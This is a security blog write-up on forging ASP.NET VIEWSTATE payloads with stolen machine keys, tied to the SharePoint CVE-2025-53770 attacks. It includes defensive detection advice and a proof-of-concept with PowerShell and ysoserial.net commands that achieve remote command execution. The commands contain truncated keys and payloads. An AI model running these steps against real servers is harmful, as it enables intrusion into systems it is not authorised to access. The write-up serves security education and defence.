ViewState — CVE-2025-53770

.NET ViewState

Approximately 10 days after SharePoint deserialization vulnerabilities (CVE-2025-53770/53771) were exploited, attackers began distributing ASPX shells designed to extract IIS/ASP.NET Machine Keys that protect VIEWSTATE and cookies. With access to a Machine Key—obtained from web.config or registry via uploaded ASPX—attackers can forge legitimate VIEWSTATE payloads using tools like ysoserial.net to achieve Remote Code Execution across applications. Windows does not automatically rotate autogenerated Machine Keys, requiring manual regeneration after any code execution incident. Defenders should monitor Windows Application Event ID 4009 (VIEWSTATE verification failures) to detect exploitation attempts.

Requirements

  • VIEWSTATE deserialization with LosFormatter enabled
  • MachineKey (validation key and optional decryption key)
  • Validation algorithm (e.g., HMACSHA256 / SHA1)
  • Application path / appDomain (used when crafting VIEWSTATE)
  • Delivery capability to send malicious VIEWSTATE to the app—such as HTTP POST—or ability to obtain MachineKey via LFI/XXE or by uploading an ASPX to read the registry

POC || GTFO

Preface

The demonstration uses findMachineKey.aspx, uploaded to the target ASP.NET webserver, which reads Machine Keys from the registry and web.config file to simulate LFI and/or RCE scenarios.

NOTE: The findMachineKey.aspx file is flagged as an exploit and removed by Windows Threat Protection.

A simple web form accepting POST requests echoes user input and serves as the delivery mechanism for malicious VIEWSTATE payloads.

Exploit Steps

1. Download and Generate Payload

Download ysoserial.net and create a base64-encoded payload:

N/APOWERSHELL
[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('whoami > C:\Windows\Temp\a.txt'))

2. Generate Malicious VIEWSTATE

Use ysoserial.net with the obtained Machine Key, validation algorithm, and application path:

N/APOWERSHELL
$ysoArgs = @(
  '-p','ViewState',
  '-g','TextFormattingRunProperties',
  '-c','"powershell -e dwBo[truncated]HQA"',
  '--path','/default.aspx',
  '--apppath','/',
  '--validationalg','HMACSHA256',
  '--validationkey','B298[truncated]173D',
  '--islegacy',
  '--isdebug'
)
 
.\ysonet.exe @ysoArgs

Output includes the calculated __VIEWSTATEGENERATOR and encoded payload.

3. Send POST Request

Submit the malicious VIEWSTATE payload to the target application. A 500 Internal Server Error response indicates successful exploitation.

4. Verify Execution

Confirm command execution by checking for the created file: C:\Windows\Temp\a.txt

References

Disclaimer

All content published on exploit.se is intended strictly for educational and informational purposes. Research is conducted responsibly under coordinated disclosure principles.

Techniques, tools, and writeups shared on this site are meant to advance the security community's understanding of vulnerabilities and defences. They are not intended to encourage or enable unauthorised access to any system.

The author bears no responsibility for any misuse of information presented here.

Cookie Settings

This site does not use cookies, analytics, or any third-party tracking technologies.

No personal data is collected. No fingerprinting. No ads. You are not the product.


 ██╗ ██████╗ ███████╗██╗███████╗███╗   ██╗██████╗
 ██║██╔═══██╗██╔════╝██║██╔════╝████╗  ██║██╔══██╗
 ██║██║   ██║█████╗  ██║█████╗  ██╔██╗ ██║██║  ██║
 ██║██║   ██║██╔══╝  ██║██╔══╝  ██║╚██╗██║██║  ██║
 ██║╚██████╔╝██║     ██║███████╗██║ ╚████║██████╔╝
 ╚═╝ ╚═════╝ ╚═╝     ╚═╝╚══════╝╚═╝  ╚═══╝╚═════╝
You found me.
↑↑↓↓←→←→ B A  ·  click to close